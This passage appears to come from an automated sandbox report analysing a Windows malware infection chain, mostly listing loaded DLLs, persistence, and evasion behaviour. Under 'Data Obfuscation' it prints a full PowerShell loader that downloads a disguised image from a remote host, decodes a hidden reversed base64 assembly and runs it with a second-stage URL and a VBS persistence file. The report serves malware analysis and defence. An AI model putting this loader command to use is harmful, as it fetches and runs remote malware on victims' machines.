                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.storage.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wldp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: profapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winhttp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winnsi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windowscodecs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: propsys.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: edputil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: policymanager.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: msvcp110_win.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wintypes.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: appresolver.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: bcp47langs.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: slc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: userenv.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sppc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
                        Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: winmm.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: urlmon.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: wininet.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iertutil.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: srvcli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: iphlpapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: sspicli.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: mswsock.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: dnsapi.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rasadhlp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptsp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: rsaenh.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

                        Data Obfuscation

                        Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("powershell.exe -Command "$noninterest = 'https://res.cloudinary.com/dzvai8", "0", "false");
                        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));" (this identical process creation is recorded four times in the report)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_004567E0 push eax; ret 12_2_004567FE
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0045B9DD push esi; ret 12_2_0045B9E6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00455EAF push ecx; ret 12_2_00455EC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00433FF6 push ecx; ret 12_2_00434009
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 15_2_02C9F6D8 push esp; iretd 15_2_02C9F6D9

                        Persistence and Installation Behavior

                        Source: C:\Windows\System32\cmd.exe File created: C:\ProgramData\talpe.vbs
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00406128 ShellExecuteW,URLDownloadToFileW, 12_2_00406128
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 12_2_00419BC4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress, 12_2_0041BCE3
                        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX (recorded 3 times in the report)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (recorded 60 times in the report)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040E54F Sleep,ExitProcess
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 15_2_02DDF830 sldt word ptr [eax]
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_004198C2 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
                        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (2 occurrences)
                        Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4031
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5841
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4122
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5636
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7484 Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7984 Thread sleep count: 4122 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972 Thread sleep count: 5636 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020 Thread sleep time: -25825441703193356s >= -30000s
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264 Thread sleep count: 135 > 30
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7264 Thread sleep time: -67500s >= -30000s
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 occurrences)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Last function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
